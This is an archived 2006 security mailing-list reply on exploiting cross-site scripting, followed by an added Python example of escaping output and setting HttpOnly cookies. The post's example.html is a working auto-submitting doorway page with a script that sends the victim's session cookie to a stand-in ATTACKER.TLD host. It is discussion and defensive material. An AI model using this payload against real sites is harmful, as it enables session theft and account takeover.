Vulnerability Development: Re: Sourceforge.net XSS

Re: Sourceforge.net XSS

From: ascii <ascii_at_katamail.com>
Date: Fri, 14 Apr 2006 05:15:13 +0200

v9_at_fakehalo.us wrote:
> I understand the possibilities of XSS, however if you
> have to inject it as part of the URL
[cut]

xss are serious bugs, like header injection and session fixation

xss are less critical than full sql injections + onto outfile in your
cgi-bin directory (for example) or other vectors

anyway, an xss can be exploited in many ways and also in conjunction
with other technologies, like phishing

another way could be a doorway page, like for http post xss

this is an example

--example.html--

<html>
<head>
 <title>title</title>
 <style type="text/css" media="screen,print">
 body { margin:0; padding:0; }
 body, html{ font-family:"Trebuchet MS", Georgia, Verdana, serif;
color:white; }
 a { color:white; text-decoration:none; }
 </style>
 </head>
 <body onload="document.login_form.submit()"><!-- force gateway, onload -->
 <table width="100%" height="100%" bgcolor="#9BBB38"><tr><td
valign="center" align="center">

  <!-- simple and effective, xss post gateway coded by ascii, vuln by
saidone -->
  <form method="post" action="http://www.VICTIM.TLD/admin/index.php"
name="login_form">
   <input type="hidden" id="user" name="FIELD_username"
value="<script>javascript:alert('XSS vuln, your cookie is
'+document.cookie+'. Now your PHP session is haxored and the cookie
value is sent back to the malicious haxor! (Press OK to send the cookie
value and continue you hajacked navigation..)');document.write('<img
src=\'http://ATTACKER.TLD/cookie.php?cookie='+document.cookie+'\'>');</script>"
/>
   <input type="hidden" id="pass" name="FIELD_password" value="" />
   <!--<button type="submit" name="submit">Vai</button>-->
  </form>
  <div style="background-color: green; height: 95%; width: 95%;"
onclick="document.login_form.submit()"
onmouseover="document.login_form.submit()"><!-- force gateway, onclick
and onmouseover -->
   <h1><a href="#" onclick="document.login_form.submit()">click
everywhere</a></h1><!-- force gateway, onclick -->
  </div>
  <!-- the end : ) -->

</td></tr></table><img src="http://devel.ush.it/track/me.php" /><a
href="http://www.ush.it">www.ush.it</a>
</body>
</html>

--/example.html--

cookie.php will store the user session cookie, if you need a generic
logger you could dump any GPC variables as done by this simple script

http://www.ush.it/team/ascii/hack-xsstrap/track.phps

for http get xss you could use meta refresh or document.location
directly (simpler to implement, less code)

regards, ascii, http://www.ush.it/
Received on Apr 13 2006
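Added example (mine, not code from ascii's post or from the sourceforge site): the server-side reflection that the doorway page above relies on, shown beside its fix. It assumes the victim admin page echoes the posted FIELD_username back into its HTML on a failed login (a hypothetical handler; the field name is the one used in the post's form), and shows the HttpOnly flag that keeps document.cookie from exposing the session cookie the payload tries to exfiltrate.

```python
from html import escape

# Constructed payload, shortened from the one in the post's FIELD_username value.
PAYLOAD = ("<script>document.write('<img src=\\'http://ATTACKER.TLD/cookie.php?"
           "cookie='+document.cookie+'\\'>');</script>")


def render_login_error_vulnerable(username: str) -> str:
    """Echoes the posted username verbatim, so the browser parses the
    payload as markup and runs the script in the site's origin."""
    return f"<p>Login failed for user {username}</p>"


def render_login_error_fixed(username: str) -> str:
    """Encodes < > & and quotes: the posted value is rendered as text."""
    return f"<p>Login failed for user {escape(username, quote=True)}</p>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie line for the session cookie (PHPSESSID is PHP's default name).
    With HttpOnly the cookie is still sent on requests but is invisible to
    document.cookie, so the exfiltration in the payload reads an empty value."""
    return f"Set-Cookie: PHPSESSID={session_id}; Path=/; HttpOnly"


def contains_raw_script_tag(html: str) -> bool:
    """Crude check for the demonstration: does an unencoded <script> survive?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    print(render_login_error_vulnerable(PAYLOAD))
    print(render_login_error_fixed(PAYLOAD))
    print(session_cookie_header("example-session-id"))
```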
